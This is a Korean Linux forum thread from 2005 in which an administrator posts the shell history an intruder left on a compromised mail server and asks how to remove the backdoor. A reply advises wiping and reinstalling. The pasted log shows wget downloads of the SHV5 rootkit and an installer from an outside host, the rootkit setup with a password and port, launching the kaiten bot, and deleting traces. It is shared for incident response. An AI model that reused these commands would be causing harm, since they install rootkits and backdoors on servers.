현재 위치

›› Forums ›› 공부 ›› 설치 및 활용 QnA

백도어 삭제 방법을 알려 주십시요.

since90의 이미지
글쓴이: since90 / 작성시간: 수, 2005/01/05 - 8:17오후

004년 12월 31일 10시 46분경 전후
아래와 같이 해킹됬습니다.

[root@mail1 root]# sh inst
[root@mail1 root]# rm -rf inst
[root@mail1 root]# tar -zxvf shv5.tar.gz
[root@mail1 root]# cd /lib/security/.sk12
[root@mail1 root]# ./sk
[root@mail1 root]# cd /tmp/shv5
[root@mail1 root]# ./setup lowkeyzorz 37998
[root@mail1 root]# cd /tmp
[root@mail1 root]# ls
[root@mail1 root]# locate /
[root@mail1 root]# ls
[root@mail1 root]# ls
[root@mail1 root]# rm -rf /lib/security/.sk12
[root@mail1 root]# wget hbc.z
[root@mail1 root]# cd /dev
[root@mail1 root]# ftp
[root@mail1 root]# chmod +x kaiten
[root@mail1 root]# ./kaiten
[root@mail1 root]# cat /proc/meminfo
[root@mail1 root]# cat /proc/cpuinfo
[root@mail1 root]# cd /root
[root@mail1 root]# cat .bash_history
[root@mail1 root]# exit
[root@mail1 root]# rm -rf brk
[root@mail1 root]# wget hbc.zuka.net/shv5.tar.gz
[root@mail1 root]# wget hbc.zuka.net/inst
[root@mail1 root]# sh
[root@mail1 root]# exit

나름데로 공부해서 조치하려 했지만 조심스럽습니다.
부탁 드리겠습니다.

Forums: 
설치 및 활용 QnA
서지훈의 이미지

글쓴이: 서지훈 / 작성시간: 수, 2005/01/05 - 10:04오후

재작자 만이 알겠죠...ㅡㅡㅋ
알려진게 아니라면 그냥 밀고 다시 설치를 하시고...
알려진거라도 다른 무언가 다른게 있을지 모르니, 다시 밀고 사용하시길.
뭐... 그렇게 중요한 서버가 아니라면 그냥 돌아갈 정도로만 복구하시고...
가끔 남모르는 방문자를 무시하시고 사용을 하시는 방법밖에 없습니다.

예방만이 최선책일뿐, 한 번이라도 뚫린 시스템은 99.99 % 위험합니다.

<어떠한 역경에도 굴하지 않는 '하양 지훈'>

#include <com.h> <C2H5OH.h> <woman.h>
do { if (com) hacking(); if (money) drinking(); if (women) loving(); } while (1);

댓글 달기

텍스트 포맷에 대한 자세한 정보

Filtered HTML

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • You can use Textile markup to format text.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • Quick Tips:
    • Two or more spaces at a line's end = Line break
    • Double returns = Paragraph
    • *Single asterisks* or _single underscores_ = Emphasis
    • **Double** or __double__ = Strong
    • This is [a link](http://the.link.example.com "The optional title text")
    For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

  • HTML 태그를 사용할 수 없습니다.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 줄과 단락은 자동으로 분리됩니다.
댓글 첨부 파일
이 댓글에 이미지나 파일을 업로드 합니다.
파일 크기는 8 MB보다 작아야 합니다.
허용할 파일 형식: txt pdf doc xls gif jpg jpeg mp3 png rar zip.
CAPTCHA
이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.